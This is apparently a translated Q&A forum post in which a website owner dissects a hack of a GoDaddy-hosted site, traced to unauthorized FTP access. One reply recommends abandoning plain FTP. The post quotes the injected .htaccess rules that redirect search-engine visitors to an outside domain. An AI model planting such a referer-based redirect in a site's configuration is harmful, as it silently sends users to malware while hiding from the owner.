Dea*_*bby 9 hacking ftp godaddy .htaccess
我的网站被黑了,此时,我知道一些细节,但我不知道它究竟是如何发生的,也不知道如何在未来防止它发生。我需要你的帮助来剖析这次攻击,以便我可以防止它再次发生。这有点长,但我想确保我提供了足够的信息来帮助解决问题。
这就是发生的事情。
几周前,我收到了来自托管公司 GoDaddy 的电子邮件,说我的网站使用了太多资源,他们预计 MySQL 查询是罪魁祸首。有问题的查询是一个搜索查询,其中包含 5-6 个术语。根据我的设置方式,您搜索的术语越多,查询就越复杂。没问题。我修复了它,但与此同时,GoDaddy 也暂时关闭了我的帐户,大约 3 天后一切才恢复正常。
在那次事件之后,我的搜索引擎流量急剧下降,大约 90%。它很糟糕,因为我什么都没想到,将其写入查询失败并认为它会在 Google 重新抓取该网站时及时返回。它没有。
几天前,我收到一封来自用户的电子邮件,说我的网站托管了恶意软件。我直接在浏览器中加载了该站点,但没有看到任何注入到页面中的内容。然后我检查了我的 .htaccess 文件,发现以下内容:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=584 [R,L]
</IfModule>
可爱的。而且有点狡猾。从地址栏或书签直接导航到站点,我通常会像往常一样加载站点。我很少通过搜索引擎的链接访问我的网站,所以这就是为什么只要有黑客攻击就没有被发现的原因。该恶意软件也没有直接托管在我的网站上。
快速搜索显示其他人也遇到了同样的问题,但我怀疑还有很多人还没有发现它。大多数建议是升级到最新版本的软件、更改密码等。
由于我使用的是我自己的自定义内容管理系统而不是无处不在的 Wordpress,因此我进行了更深入的挖掘。我扫描了所有文件以查找 PHP 漏洞利用中使用的常用函数:base64_decode、exec、shell 等……没有发现任何可疑的东西,也没有额外的文件。
我接下来检查了 GoDaddy 的文件管理器历史记录,发现 .htaccess 文件在我的搜索查询被指控使用过多服务器资源的同一日期更改。这可能是一个不幸的巧合,但我并不完全确定。.htaccess 文件中的重定向似乎不是资源密集型的,而且查询足够复杂,可能是资源密集型的。
我想确定我的代码不是问题,所以我在修改 .htaccess 文件时检查了流量日志中是否有可疑活动,但没有看到任何看起来异常或类似的 GET 或 POST 活动黑客尝试。
最后,我向GoDaddy请求了FTP日志,发现在更改.htaccess文件时存在未经授权的FTP访问。当时我正在休假,我的计算机物理关闭,并且没有其他人拥有访问凭据。看起来 FTP 的任何人都使用了该帐户的主要 FTP 用户,但 IP 为 91.220.0.19,这看起来像是来自Latvia。
在共享主机上,GoDaddy 似乎会根据站点 URL 自动分配主 FTP 用户名。这是非常可预测的,或者至少是在我设置托管帐户时。几年前我第一次注册了托管帐户,所以它可能已经改变了,但据我所知,我无法选择主 FTP 用户名。目前,您也无法更改用户名,听起来 GoDaddy 也无法更改,除非您取消帐户并辞职。虽然您可以创建、删除和编辑其他 FTP 用户,但不能删除主要 FTP 用户。只能更改密码。
除了主要的 FTP 用户名之外,站点、数据库、管理员和帐户的所有访问凭据都是乱码,随机的用户名和密码,看起来就像你的猫在你的键盘上行走。例如:lkSADf32!$asJd3。
我已经彻底扫描了我的计算机是否有病毒、恶意软件等,以防它是链接中的弱点,但根本没有发现任何问题。我使用防火墙、防病毒程序,并尝试使用安全的浏览习惯。
当我更新我的网站时,我使用 Core FTP LE 和 SSH/SFTP 连接。主机帐户是 Linux 设置。
在与 GoDaddy 技术支持人员交谈时,他们不确定 FTP 密码是如何被泄露的。在共享主机上,他们无法在 FTP 用户级别放置 IP 块。他们也无法更改主 FTP 用户名。当我问他们是否对 FTP 访问进行了强力保护时,该技术人员起初听起来不确定,但在我改写了几次之后他们说他们做到了。但是,我想我记得在之前的电话会议中问过同样的问题,并听说 GoDaddy 没有对 FTP 访问进行强力保护。在这一点上,我不知道他们是否这样做。
我已经全面更改了所有访问凭据,并使用 .htaccess 文件禁止了拉脱维亚 IP 地址(如果他们使用 FTP,可能不会有什么不同),但我仍然不确定 FTP密码一开始就被泄露了。
我相当确定问题不在于我的代码(即使是,也不应该暴露 FTP 信息)或我的计算机。我怀疑,但不知道如何证明,FTP 密码是暴力破解的,因为用户名是可预测的。蛮力攻击也可能与服务器资源被用完(归咎于我的查询)同时发生,但我对服务器的技术方面了解不足,无法知道这是否可能或什至可能。
现在我觉得我已经不知道该做什么了。我希望能够了解攻击是如何进行的以及如何阻止它,所以如果您对攻击向量、可以运行的诊断或其他安全措施有任何进一步的想法,我将不胜感激。我非常愿意更换主机或放弃共享主机,但我想确保我可以防止这种情况再次发生。
帮帮我,欧比旺·克诺比……
简单!不要使用FTP。它以纯文本形式传输凭证并以纯文本形式传输所有数据。这是最不安全的文件传输方式之一。如果您的主机不支持任何其他方式,请寻找新主机。
| 归档时间: |
|
| 查看次数: |
1255 次 |
| 最近记录: |